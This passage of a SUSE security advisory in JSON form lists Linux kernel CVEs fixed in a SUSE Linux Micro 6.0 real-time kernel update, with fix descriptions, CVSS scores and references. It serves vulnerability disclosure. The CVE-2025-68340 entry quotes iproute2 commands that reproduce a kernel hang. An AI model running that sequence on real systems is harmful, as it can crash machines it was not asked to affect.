"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\natm/fore200e: Fix possible data race in fore200e_open()\n\nProtect access to fore200e-\u003eavailable_cell_rate with rate_mtx lock in the\nerror handling path of fore200e_open() to prevent a data race.\n\nThe field fore200e-\u003eavailable_cell_rate is a shared resource used to track\navailable bandwidth. It is concurrently accessed by fore200e_open(),\nfore200e_close(), and fore200e_change_qos().\n\nIn fore200e_open(), the lock rate_mtx is correctly held when subtracting\nvcc-\u003eqos.txtp.max_pcr from available_cell_rate to reserve bandwidth.\nHowever, if the subsequent call to fore200e_activate_vcin() fails, the\nfunction restores the reserved bandwidth by adding back to\navailable_cell_rate without holding the lock.\n\nThis introduces a race condition because available_cell_rate is a global\ndevice resource shared across all VCCs. If the error path in\nfore200e_open() executes concurrently with operations like\nfore200e_close() or fore200e_change_qos() on other VCCs, a\nread-modify-write race occurs.\n\nSpecifically, the error path reads the rate without the lock. If another\nCPU acquires the lock and modifies the rate (e.g., releasing bandwidth in\nfore200e_close()) between this read and the subsequent write, the error\npath will overwrite the concurrent update with a stale value. This results\nin incorrect bandwidth accounting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68339",
"url": "https://www.suse.com/security/cve/CVE-2025-68339"
},
{
"category": "external",
"summary": "SUSE Bug 1255505 for CVE-2025-68339",
"url": "https://bugzilla.suse.com/1255505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68339"
},
{
"cve": "CVE-2025-68340",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68340"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: Move team device type change at the end of team_port_add\n\nAttempting to add a port device that is already up will expectedly fail,\nbut not before modifying the team device header_ops.\n\nIn the case of the syzbot reproducer the gre0 device is\nalready in state UP when it attempts to add it as a\nport device of team0, this fails but before that\nheader_ops-\u003ecreate of team0 is changed from eth_header to ipgre_header\nin the call to team_dev_type_check_change.\n\nLater when we end up in ipgre_header() struct ip_tunnel* points to nonsense\nas the private data of the device still holds a struct team.\n\nExample sequence of iproute2 commands to reproduce the hang/BUG():\nip link add dev team0 type team\nip link add dev gre0 type gre\nip link set dev gre0 up\nip link set dev gre0 master team0\nip link set dev team0 up\nping -I team0 1.1.1.1\n\nMove team_dev_type_check_change down where all other checks have passed\nas it changes the dev type with no way to restore it in case\none of the checks that follow it fail.\n\nAlso make sure to preserve the origial mtu assignment:\n - If port_dev is not the same type as dev, dev takes mtu from port_dev\n - If port_dev is the same type as dev, port_dev takes mtu from dev\n\nThis is done by adding a conditional before the call to dev_set_mtu\nto prevent it from assigning port_dev-\u003emtu = dev-\u003emtu and instead\nletting team_dev_type_check_change assign dev-\u003emtu = port_dev-\u003emtu.\nThe conditional is needed because the patch moves the call to\nteam_dev_type_check_change past dev_set_mtu.\n\nTesting:\n - team device driver in-tree selftests\n - Add/remove various devices as slaves of team device\n - syzbot",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68340",
"url": "https://www.suse.com/security/cve/CVE-2025-68340"
},
{
"category": "external",
"summary": "SUSE Bug 1255507 for CVE-2025-68340",
"url": "https://bugzilla.suse.com/1255507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68340"
},
{
"cve": "CVE-2025-68345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi()\n\nThe acpi_get_first_physical_node() function can return NULL, in which\ncase the get_device() function also returns NULL, but this value is\nthen dereferenced without checking,so add a check to prevent a crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68345",
"url": "https://www.suse.com/security/cve/CVE-2025-68345"
},
{
"category": "external",
"summary": "SUSE Bug 1255601 for CVE-2025-68345",
"url": "https://bugzilla.suse.com/1255601"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68345"
},
{
"cve": "CVE-2025-68346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68346"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: dice: fix buffer overflow in detect_stream_formats()\n\nThe function detect_stream_formats() reads the stream_count value directly\nfrom a FireWire device without validating it. This can lead to\nout-of-bounds writes when a malicious device provides a stream_count value\ngreater than MAX_STREAMS.\n\nFix by applying the same validation to both TX and RX stream counts in\ndetect_stream_formats().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68346",
"url": "https://www.suse.com/security/cve/CVE-2025-68346"
},
{
"category": "external",
"summary": "SUSE Bug 1255603 for CVE-2025-68346",
"url": "https://bugzilla.suse.com/1255603"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68346"
},
{
"cve": "CVE-2025-68347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events\n\nThe DSP event handling code in hwdep_read() could write more bytes to\nthe user buffer than requested, when a user provides a buffer smaller\nthan the event header size (8 bytes).\n\nFix by using min_t() to clamp the copy size, This ensures we never copy\nmore than the user requested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68347",
"url": "https://www.suse.com/security/cve/CVE-2025-68347"
},
{
"category": "external",
"summary": "SUSE Bug 1255706 for CVE-2025-68347",
"url": "https://bugzilla.suse.com/1255706"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68347"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix refcount leak in exfat_find\n\nFix refcount leaks in `exfat_find` related to `exfat_get_dentry_set`.\n\nFunction `exfat_get_dentry_set` would increase the reference counter of\n`es-\u003ebh` on success. Therefore, `exfat_put_dentry_set` must be called\nafter `exfat_get_dentry_set` to ensure refcount consistency. This patch\nrelocate two checks to avoid possible leaks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68351",
"url": "https://www.suse.com/security/cve/CVE-2025-68351"
},
{
"category": "external",
"summary": "SUSE Bug 1255567 for CVE-2025-68351",
"url": "https://bugzilla.suse.com/1255567"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68351"
},
{
"cve": "CVE-2025-68354",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68354"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: core: Protect regulator_supply_alias_list with regulator_list_mutex\n\nregulator_supply_alias_list was accessed without any locking in\nregulator_supply_alias(), regulator_register_supply_alias(), and\nregulator_unregister_supply_alias(). Concurrent registration,\nunregistration and lookups can race, leading to:\n\n1 use-after-free if an alias entry is removed while being read,\n2 duplicate entries when two threads register the same alias,\n3 inconsistent alias mappings observed by consumers.\n\nProtect all traversals, insertions and deletions on\nregulator_supply_alias_list with the existing regulator_list_mutex.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68354",
"url": "https://www.suse.com/security/cve/CVE-2025-68354"
},
{
"category": "external",
"summary": "SUSE Bug 1255553 for CVE-2025-68354",
"url": "https://bugzilla.suse.com/1255553"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68354"
},
{
"cve": "CVE-2025-68362",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68362"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb()\n\nThe rtl8187_rx_cb() calculates the rx descriptor header address\nby subtracting its size from the skb tail pointer.\nHowever, it does not validate if the received packet\n(skb-\u003elen from urb-\u003eactual_length) is large enough to contain this\nheader.\n\nIf a truncated packet is received, this will lead to a buffer\nunderflow, reading memory before the start of the skb data area,\nand causing a kernel panic.\n\nAdd length checks for both rtl8187 and rtl8187b descriptor headers\nbefore attempting to access them, dropping the packet cleanly if the\ncheck fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68362",
"url": "https://www.suse.com/security/cve/CVE-2025-68362"
},
{
"category": "external",
"summary": "SUSE Bug 1255611 for CVE-2025-68362",
"url": "https://bugzilla.suse.com/1255611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68362"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
